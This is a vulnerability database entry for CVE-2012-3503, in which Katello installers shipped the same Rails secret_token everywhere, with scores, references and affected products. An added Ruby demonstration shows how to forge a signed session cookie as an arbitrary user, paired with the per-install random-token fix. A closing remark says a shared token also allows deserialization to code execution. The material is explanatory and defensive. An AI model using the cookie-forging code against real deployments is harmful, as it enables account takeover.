CVE-2012-3503
Severity: CRITICAL
Katello < 1.0 - Use of Hard-coded Credentials in Installation Script
The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
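To make the impact concrete, the following is an added Ruby example, not code from the Katello project, the installer, or the referenced patch. It re-implements the Rails 3-era cookie session store's signing scheme (Marshal-dumped session, Base64, HMAC-SHA1 under config.secret_token) so the attack is visible end to end: whoever knows the secret_token can mint a cookie that authenticates as any user id. The SHARED_DEFAULT_TOKEN string is a constructed placeholder and is not the real token Katello shipped; forge_admin_cookie, authenticated_user_id and generate_secret_token are hypothetical names introduced for this demonstration.

```ruby
require 'openssl'
require 'base64'
require 'securerandom'

# Minimal re-implementation of the Rails 3 cookie session store's
# message verifier. The session hash is Marshal-dumped, Base64-encoded
# and signed with HMAC-SHA1 keyed by config.secret_token. The server
# trusts any cookie whose signature verifies, so the secret IS the
# authentication: anyone holding it can mint arbitrary sessions.
module CookieStore
  def self.sign(session, secret)
    data = Base64.strict_encode64(Marshal.dump(session))
    "#{data}--#{digest(data, secret)}"
  end

  # Returns the session hash, or nil if the cookie is malformed or the
  # signature does not match this server's secret.
  def self.verify(cookie, secret)
    data, sig = cookie.split('--', 2)
    return nil unless data && sig
    return nil unless secure_compare(digest(data, secret), sig)
    Marshal.load(Base64.strict_decode64(data))
  end

  def self.digest(data, secret)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
  end

  # Constant-time comparison so signature checks do not leak timing.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Constructed placeholder standing in for a secret_token that an
# installer writes out verbatim on every host. NOT the real Katello value.
SHARED_DEFAULT_TOKEN = 'installer-static-secret-placeholder-do-not-ship'

# What a fixed installer should do instead: derive a fresh 512-bit secret
# per installation (the same shape `rake secret` produces).
def generate_secret_token
  SecureRandom.hex(64)
end

# Attacker side: with the (shared) secret, forge a session that claims
# to belong to an arbitrary user id. No password, no existing session.
def forge_admin_cookie(secret, user_id: 1)
  session = { 'user_id' => user_id, 'session_id' => SecureRandom.hex(16) }
  CookieStore.sign(session, secret)
end

# Server side: which user does this cookie authenticate as, if any?
def authenticated_user_id(cookie, server_secret)
  session = CookieStore.verify(cookie, server_secret)
  session && session['user_id']
end

if __FILE__ == $PROGRAM_NAME
  forged = forge_admin_cookie(SHARED_DEFAULT_TOKEN, user_id: 1)
  puts "shared default token accepts forged cookie as user " \
       "#{authenticated_user_id(forged, SHARED_DEFAULT_TOKEN).inspect}"
  puts "per-install random token accepts it as user " \
       "#{authenticated_user_id(forged, generate_secret_token).inspect}"
end
```

Two practitioner notes. First, the forged cookie is accepted only because both sides share the same secret; regenerating secret_token per install (and rotating it after this advisory, which invalidates all existing sessions) is the whole fix, which is why the upstream change is a one-line installer patch. Second, in Rails of this era the session payload is Marshal-loaded after signature verification, so a leaked or shared secret_token is not just an authentication bypass but a deserialization-to-code-execution primitive; treat any deployment that ever ran with a known token as fully compromised, not merely as having weak sessions.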
References (6)
- http://secunia.com/advisories/50344 (Secunia third-party advisory; broken link)
- http://rhn.redhat.com/errata/RHSA-2012-1187.html (Red Hat vendor advisory)
- http://www.securityfocus.com/bid/55140 (SecurityFocus BID 55140, VDB entry; broken link)
- https://github.com/Katello/katello/pull/499 (issue tracking: upstream pull request)
- https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3 (patch: upstream commit)
- http://rhn.redhat.com/errata/RHSA-2012-1186.html (Red Hat vendor advisory; broken link)
Scores
CVSS v3: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK
EPSS: 0.0130 (percentile 80.0%)
Details
CWE: CWE-798 (Use of Hard-coded Credentials)
Status: published
Products (3)
- redhat/enterprise_linux_server 6.0
- rubygems/katello 0 - 1.0.6 (RubyGems)
- theforeman/katello < 1.0
Published: Aug 25, 2012
Tracked since: Feb 18, 2026